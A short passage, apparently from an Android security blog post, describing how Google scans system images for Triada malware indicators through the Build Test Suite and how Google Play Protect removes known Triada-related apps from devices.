We are also performing a security review of system images through the Build Test Suite. You can read more about this program in the Android Security 2018 Year in Review report. Triada indicators of compromise are one of many signatures included in the system image scan. Additionally, Google Play Protect continues to track and remove any known versions of Triada and Triada-related apps it detects from user devices.